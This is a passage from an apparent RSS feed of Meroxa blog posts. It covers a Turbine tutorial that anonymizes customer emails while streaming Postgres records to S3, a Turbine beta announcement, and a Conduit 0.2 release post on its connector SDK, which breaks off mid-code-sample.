&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;cp&lt;/span&gt; &lt;span class=&quot;token parameter variable&quot;&gt;-r&lt;/span&gt; ~/turbine-js-examples/real-time-data-lake-ingestion ~/&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;4&quot;&gt;
&lt;li&gt;Install NPM dependencies:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;cd&lt;/span&gt; real-time-data-lake-ingestion&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;npm&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;install&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now we are ready to build.&lt;/p&gt;
&lt;h3&gt;Application Entrypoint&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine#application-entrypoint&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Within &lt;code class=&quot;language-text&quot;&gt;index.js&lt;/code&gt;, you will find the main entrypoint to our data application:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; stringHash &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;require&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;string-hash&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;iAmHelping&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;str&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token template-string&quot;&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;~~~&lt;/span&gt;&lt;span class=&quot;token interpolation&quot;&gt;&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;${&lt;/span&gt;str&lt;span class=&quot;token interpolation-punctuation punctuation&quot;&gt;}&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;~~~&lt;/span&gt;&lt;span class=&quot;token template-punctuation string&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;isAttributePresent&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;typeof&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;attr&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;!==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;undefined&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; attr &lt;span class=&quot;token operator&quot;&gt;!==&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;null&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

exports&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;App &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;App&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token function&quot;&gt;anonymize&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    records&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;forEach&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;record&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; payload &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;value&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;payload&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;isAttributePresent&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;isAttributePresent&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;customer_email&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;customer_email &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;iAmHelping&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
          &lt;span class=&quot;token function&quot;&gt;stringHash&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;after&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;customer_email&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;toString&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;customer_order&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; anonymized &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;anonymize&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;anonymized&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customer_order&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here is what the code does:&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;exports.App&lt;/code&gt; - This is the entry point for your data application. It is responsible for identifying the upstream datastore, the upstream records, and the code to execute against those records. This is the data pipeline logic (move data from here to there).&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;anonymize&lt;/code&gt; is the method defined on our &lt;code class=&quot;language-text&quot;&gt;App&lt;/code&gt; that will be called to process the data. It takes a single parameter, &lt;code class=&quot;language-text&quot;&gt;records&lt;/code&gt;, an array of records, and returns a new array of records containing the anonymized data.&lt;/p&gt;
&lt;h3&gt;Running&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine#running&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Next, you may run your data application locally:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app run&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Turbine uses &lt;a href=&quot;https://docs.meroxa.com/getting-started/quickstart#run-a-streaming-app-locally&quot;&gt;fixtures to simulate your data&lt;/a&gt; infrastructure locally, which lets you test without having to worry about the infrastructure itself. Fixtures are JSON-formatted data records you can develop against locally. To customize the fixtures for your application, look in the &lt;code class=&quot;language-text&quot;&gt;fixtures&lt;/code&gt; directory.&lt;/p&gt;
&lt;h3&gt;Deployment&lt;a href=&quot;https://docs.meroxa.com/guides/2022/04/20/real-time-data-lake-ingestion-with-turbine#deployment&quot; title=&quot;Direct link to heading&quot;&gt;​&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;After you test the behavior locally, you can deploy it to Meroxa.&lt;/p&gt;
&lt;p&gt;Meroxa is the data platform that runs your Turbine apps. Meroxa takes care of maintaining the connection to your database and executing your application as changes occur. All you need to worry about is the data application itself.&lt;/p&gt;
&lt;p&gt;Here is how you deploy:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;Add a PostgreSQL resource&lt;/a&gt; to your Meroxa environment:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; postgres &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; postgres://&lt;span class=&quot;token variable&quot;&gt;$PG_USER&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PASS&lt;/span&gt;@&lt;span class=&quot;token variable&quot;&gt;$PG_URL&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$PG_PORT&lt;/span&gt;/&lt;span class=&quot;token variable&quot;&gt;$PG_DB&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/amazon-s3&quot;&gt;Add an Amazon S3 resource&lt;/a&gt; to your Meroxa environment:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create datalake &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--type&lt;/span&gt; s3 &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;token parameter variable&quot;&gt;--url&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;token output&quot;&gt;&quot;s3://$AWS_ACCESS_KEY:$AWS_ACCESS_SECRET@$AWS_REGION/$AWS_S3_BUCKET&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;Deploy to Meroxa:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa app deploy&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That&apos;s it! Your data application is now running. You can verify the data in your Amazon S3 bucket.&lt;/p&gt;
&lt;p&gt;We can&apos;t wait to see what you build 🚀.&lt;/p&gt;
&lt;p&gt;If you have any questions or feedback: &lt;a href=&quot;https://discord.com/invite/pN24QPca6b/&quot;&gt;Join the Community&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Turbine: Putting the “App” in Data App]]></title><description><![CDATA[We’re excited to share the next chapter of Meroxa and what it means for software engineers to build, test and deploy data applications.]]></description><link>https://meroxa.com/blog/turbine-putting-the-app-in-data-app</link><guid isPermaLink="false">https://meroxa.com/blog/turbine-putting-the-app-in-data-app</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Wed, 20 Apr 2022 16:12:00 GMT</pubDate><content:encoded>&lt;p&gt;We’re excited to share the next chapter of Meroxa and what it means for software engineers to build, test, and deploy data applications. Building data-driven applications in today’s world is incredibly complex. Most of the underlying infrastructure and tooling that makes real-time and event-driven applications possible requires that developers build all sorts of plumbing before they can deliver real value to their customers. The standard DevOps practices that developers have come to expect when building web apps are almost non-existent in the current data app world.&lt;/p&gt;
&lt;p&gt;Today, Meroxa is pleased to introduce a public beta of Turbine. Turbine is a code-first data application framework that engineers can use to build features that respond to and run code against data changes and events, in real-time. The best part about Turbine is that it fits within your current development workflows (e.g. Build, Test, &amp;#x26; Deploy) to the point where building a data app will feel a lot like writing a web app. When coupled with the Meroxa platform, Turbine data apps are easily deployed and scaled to meet the velocity of the data changes happening upstream.&lt;/p&gt;
&lt;h3&gt;Getting Started&lt;/h3&gt;
&lt;p&gt;Building data apps starts with the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt; on your operating system of choice (Windows, Mac, &amp;#x26; Linux). Once you’ve got the CLI installed, creating the initial data app is a simple command:&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;$ meroxa apps init customer_360 --lang js&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;You’ll get a new directory called `customer_360` on your machine with all of the scaffolding needed to start building the app in JavaScript. The app has a small set of conventions that you need to follow. The best part about this approach is that we didn’t create any bespoke DSLs or YAML to drive the application and the infrastructure. If &lt;a href=&quot;https://github.com/meroxa/turbine-js&quot;&gt;JavaScript&lt;/a&gt; isn’t your thing, you can write Turbine apps in &lt;a href=&quot;https://github.com/meroxa/turbine-go&quot;&gt;Go&lt;/a&gt; or &lt;a href=&quot;https://github.com/meroxa/turbine-py&quot;&gt;Python&lt;/a&gt;!&lt;/p&gt;
&lt;h3&gt;Enrich Customer Data As it Comes In&lt;/h3&gt;
&lt;p&gt;Being able to respond to customers immediately is critical to engagement. At Meroxa, anytime someone creates an account, we take that data and enrich it using the Clearbit API before storing it back in our production database. We’ve taken a simplified version of our code to demonstrate how we do it. You’ll see a simple Turbine app that listens to a production PostgreSQL database (`demo_pg`) for changes, runs custom code via the `Process` function, and writes that data back to PostgreSQL.&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/1_Hv3IDjt1x2kQfIjUW8CuXw.png&quot; alt=&quot;1_Hv3IDjt1x2kQfIjUW8CuXw&quot;&gt;See the full enrich &lt;a href=&quot;https://github.com/meroxa/turbine-examples/tree/main/go/enrich&quot;&gt;example code on GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This is the core of the entire Turbine application. While this example is in Go, the same could be written in &lt;a href=&quot;https://github.com/meroxa/turbine-examples/tree/main/javascript&quot;&gt;JavaScript&lt;/a&gt; or &lt;a href=&quot;https://github.com/meroxa/turbine-examples/tree/main/python&quot;&gt;Python&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Bringing Developer Experience to Real-Time&lt;/h3&gt;
&lt;p&gt;Infrastructure should be there to support the developer and what they’re trying to accomplish, not the other way around. A lot of the emphasis on real-time architectures is placed on the infrastructure itself without regard to how developers have to code against these new paradigms. This is why real-time data apps have only been available to large organizations with dedicated teams to develop against the paradigm. That’s why we built Turbine. But don’t take our word for it:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Calvin French-Owen (Co-Founder and former CTO @ Segment):&lt;/strong&gt;&lt;/em&gt; We processed 1m+ events/second at Segment, so we built a ton of tooling to make processing data both simple and correct. We never open-sourced them, so I’m glad to see Meroxa making it available to the world with Turbine. Simple, &lt;em&gt;and&lt;/em&gt; performant.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Fredrik Björk (Co-Founder and CEO @ Grafbase):&lt;/strong&gt;&lt;/em&gt; Finally a code-first approach to real-time applications that lets developers focus on shipping code over infrastructure.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Rob Malnati (COO @ thatDot):&lt;/strong&gt; thatDot specializes in detecting complex relationships in real-time data via Quine, our open-source streaming graph processor. Turbine &amp;#x26; Meroxa makes it almost trivial for any developer to bring these new capabilities to their applications by moving data with ease so that real-time can truly be the default.&lt;/p&gt;
&lt;h3&gt;Feedback &amp;#x26; Learn More&lt;/h3&gt;
&lt;p&gt;We’ve only scratched the surface of what’s possible with data apps. During this beta period, we want to make sure we make Turbine and the Meroxa platform as reliable as possible before calling them generally available. Our promise is to be open and transparent about the current state of these solutions and build in concert with your feedback. For an in-depth look, check out the &lt;a href=&quot;https://docs.meroxa.com/&quot;&gt;documentation&lt;/a&gt;. If you have any questions or comments, feel free to connect with us on &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; or email us at &lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We’re so excited to share this next step in our journey and remove all the barriers to building real-time data applications.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.2: Making Connectors a Reality]]></title><description><![CDATA[In this release, Conduit now has an official SDK that will allow developers to build connectors for any data store.]]></description><link>https://meroxa.com/blog/conduit-0.2-making-connectors-a-reality</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.2-making-connectors-a-reality</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Tue, 05 Apr 2022 16:22:00 GMT</pubDate><content:encoded>&lt;p&gt;Conduit 0.2 is here! A data movement tool is only as good as the number of systems it can support. We’ve all seen large production environments that have many different data stores from the standard relational databases, like PostgreSQL and MySQL, to event monitoring systems, like Prometheus, and everything in between. For this reason, being able to build connectors to meet the needs of your production environments and data stores is critical. In this release, Conduit now has an official SDK that will allow developers to build connectors for any data store.&lt;/p&gt;
&lt;p&gt;The second problem that this release sets out to tackle is helping developers migrate from legacy systems to Conduit. Swapping out a critical piece of infrastructure isn’t taken lightly. Systems are usually swapped out in pieces to understand their performance characteristics and to minimize downtime and impact to downstream systems. Conduit 0.2 ships with the ability to leverage your current Kafka Connect connectors while using Conduit under the hood. The benefit is you can transition to an official Conduit connector on a timeline that works for you.&lt;/p&gt;
&lt;h3&gt;A Simple Connector Lifecycle&lt;/h3&gt;
&lt;p&gt;Building your own connector starts with the &lt;a href=&quot;https://github.com/conduitio/conduit-connector-sdk&quot;&gt;Conduit Connector SDK&lt;/a&gt; and deciding whether you need your connector to pull data from a data source, push data to a data source, or both. One of the design goals of the SDK was to make the implementation of connectors as simple and painless as possible. For example, let’s assume you want to build a connector that subscribes to a channel in Redis. The Redis connector would only need to implement four functions to be full-featured. Each function has a purpose in the connector lifecycle.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/0_81Ag8zORuCuTNxKN.png&quot; alt=&quot;0_81Ag8zORuCuTNxKN&quot;&gt;&lt;/p&gt;
&lt;p&gt;Conduit Connector Lifecycle&lt;/p&gt;
&lt;p&gt;That’s it! With these four methods, a connector can be created and you can start moving data between any of the other Conduit connectors. For more details, make sure to check out &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/architecture-decision-records/20220121-conduit-plugin-architecture.md#conduit-plugin-sdk&quot;&gt;the ADR&lt;/a&gt; for the system on GitHub.&lt;/p&gt;
&lt;h3&gt;Easing the Transition from Kafka Connect&lt;/h3&gt;
&lt;p&gt;Changing backends when you’re dealing with high-velocity data has two challenges. The first is performing a migration while data is still being produced by upstream systems; the second is subtle changes in connector behavior between the legacy system and the new one. To avoid both, Conduit lets the operator change the underlying system without having to worry about changes in connector behavior. You can make the migration while preserving the investment you may have made in building custom Kafka Connect connectors, and operators can explore the benefits of using Conduit in staging and production without getting the entire engineering team involved to change upstream or downstream systems. It’s a win-win for all!&lt;/p&gt;
&lt;p&gt;To get started, all you need to do is download the Kafka Connect package you want to use for your datastore and point Conduit to it. All of the settings you would have needed to pass to your Kafka Connect connector can pass through via the Conduit setup.&lt;/p&gt;
&lt;p&gt;Let’s assume Conduit is set up on your machine using the standard setup and you already have an empty pipeline ready to go:&lt;a href=&quot;https://gist.github.com/neovintage/80d7d4aa198f453803f988b33d86685b&quot;&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/1_RFKFnZ6iwQoLR3ty5_fPvw.png&quot; alt=&quot;1_RFKFnZ6iwQoLR3ty5_fPvw&quot;&gt;&lt;/a&gt;That’s a lot of settings! In the example above, the keys that start with `wrapper.*` are specific to the Conduit setup. The rest of the settings are for the Kafka Connect connector. Any setting name that you would have used in Kafka Connect will pass through, no need to do anything different.&lt;/p&gt;
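&lt;p&gt;The key-prefix convention described above amounts to a simple partition: anything starting with &lt;code class=&quot;language-text&quot;&gt;wrapper.&lt;/code&gt; configures Conduit&apos;s wrapper, and everything else passes straight through to the Kafka Connect connector. A minimal sketch of that split (the concrete key names below, other than the prefix, are illustrative placeholders, not real settings):&lt;/p&gt;

```javascript
// Partition a flat settings map the way the post describes: "wrapper.*" keys
// configure Conduit's Kafka Connect wrapper, and all other keys pass through
// unchanged to the underlying Kafka Connect connector.
// The concrete key names used below are hypothetical examples.
function splitSettings(settings) {
  const wrapper = {};
  const passthrough = {};
  for (const [key, value] of Object.entries(settings)) {
    if (key.startsWith("wrapper.")) {
      wrapper[key] = value;
    } else {
      passthrough[key] = value;
    }
  }
  return { wrapper, passthrough };
}

const { wrapper, passthrough } = splitSettings({
  "wrapper.log.level": "INFO", // hypothetical wrapper-specific setting
  "connection.url": "jdbc:postgresql://localhost/db", // hypothetical Kafka Connect setting
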